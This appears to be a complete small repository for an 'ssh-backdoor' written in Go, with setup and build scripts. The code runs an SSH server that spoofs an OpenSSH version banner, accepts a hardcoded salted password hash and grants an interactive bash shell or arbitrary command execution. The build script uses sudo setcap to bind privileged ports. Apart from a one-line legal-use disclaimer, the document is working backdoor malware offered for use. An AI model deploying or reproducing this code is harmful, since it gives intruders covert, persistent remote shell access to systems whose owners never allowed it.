[ { "path": "README.md", "content": "# ssh-backdoor\nThis is to be used for legal purposes ONLY.\nOnly use this on systems that you are allowed to.\n" }, { "path": "build.sh", "content": "go build -o server main.go\necho \"Sudo for cap net bind\"\nsudo setcap 'cap_net_bind_service=+ep' ./server\n" }, { "path": "main.go", "content": "package main\n\nimport (\n\t\"crypto/sha512\"\n\t\"fmt\"\n\t\"io\"\n\t\"io/ioutil\"\n\t\"log\"\n\t\"net\"\n\t\"os/exec\"\n\n\t\"github.com/creack/pty\"\n\t\"github.com/gliderlabs/ssh\"\n\t\"github.com/integrii/flaggy\"\n\tgossh \"golang.org/x/crypto/ssh\"\n\t\"golang.org/x/crypto/ssh/terminal\"\n)\n\nvar hash string = \"bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3\"\n\nfunc main() {\n\tvar (\n\t\tlport uint = 2222\n\t\tlhost net.IP = net.ParseIP(\"0.0.0.0\")\n\t\tkeyPath string = \"id_rsa\"\n\t\tfingerprint string = \"OpenSSH_8.2p1 Debian-4\"\n\t)\n\n\tflaggy.UInt(&lport, \"p\", \"port\", \"Local port to listen for SSH on\")\n\tflaggy.IP(&lhost, \"i\", \"interface\", \"IP address for the interface to listen on\")\n\tflaggy.String(&keyPath, \"k\", \"key\", \"Path to private key for SSH server\")\n\tflaggy.String(&fingerprint, \"f\", \"fingerprint\", \"SSH Fingerprint, excluding the SSH-2.0- prefix\")\n\tflaggy.String(&hash, \"a\", \"hash\", \"Hash for backdoor\")\n\tflaggy.Parse()\n\n\tlog.SetPrefix(\"SSH - \")\n\tprivKeyBytes, err := ioutil.ReadFile(keyPath)\n\tif err != nil {\n\t\tlog.Panicln(\"Error reading privkey:\\t\", err.Error())\n\t}\n\tprivateKey, err := gossh.ParsePrivateKey(privKeyBytes)\n\tif err != nil {\n\t\tlog.Panicln(\"Error parsing privkey:\\t\", err.Error())\n\t}\n\tserver := &ssh.Server{\n\t\tAddr: fmt.Sprintf(\"%s:%v\", lhost.String(), lport),\n\t\tHandler: sshterminal,\n\t\tVersion: fingerprint,\n\t\tPasswordHandler: passwordHandler,\n\t}\n\tserver.AddHostKey(privateKey)\n\tlog.Println(\"Started SSH backdoor on\", server.Addr)\n\tlog.Fatal(server.ListenAndServe())\n}\nfunc verifyPass(hash, salt, password string) bool {\n\tresultHash := hashPassword(password, salt)\n\treturn resultHash == hash\n}\n\nfunc hashPassword(password string, salt string) string {\n\thash := sha512.Sum512([]byte(password + salt))\n\treturn fmt.Sprintf(\"%x\", hash)\n}\n\nfunc sshHandler(s ssh.Session) {\n\tcommand := s.RawCommand()\n\tif command != \"\" {\n\t\ts.Write(runCommand(command))\n\t\treturn\n\t}\n\tterm := terminal.NewTerminal(s, \"$ \")\n\tfor {\n\t\tcommand, _ = term.ReadLine()\n\t\tif command == \"exit\" {\n\t\t\treturn\n\t\t}\n\t\tterm.Write(runCommand(command))\n\t}\n}\n\nfunc sshterminal(s ssh.Session) {\n\tcmd := exec.Command(\"/bin/bash\", \"-i\")\n\tptyReq, _, isPty := s.Pty()\n\tif isPty {\n\t\tcmd.Env = append(cmd.Env, fmt.Sprintf(\"TERM=%s\", ptyReq.Term))\n\t\tf, err := pty.Start(cmd)\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tgo func() {\n\t\t\tio.Copy(f, s) // stdin\n\t\t}()\n\t\tio.Copy(s, f) // stdout\n\t\tcmd.Wait()\n\t} else {\n\t\tio.WriteString(s, \"No PTY requested.\\n\")\n\t\ts.Exit(1)\n\t}\n}\n\nfunc runCommand(cmd string) []byte {\n\tresult := exec.Command(\"/bin/bash\", \"-c\", cmd)\n\tresponse, _ := result.CombinedOutput()\n\treturn response\n}\n\nfunc passwordHandler(_ ssh.Context, password string) bool {\n\treturn verifyPass(hash, \"1c362db832f3f864c8c2fe05f2002a05\", password)\n}\n" }, { "path": "setup.sh", "content": "go get -u \"github.com/gliderlabs/ssh\"\ngo get -u \"golang.org/x/crypto/ssh\"\ngo get -u \"golang.org/x/crypto/ssh/terminal\"\ngo get -u \"github.com/integrii/flaggy\"\ngo get -u \"github.com/creack/pty\"\nssh-keygen -f ./id_rsa\ngo build -o server main.go" } ]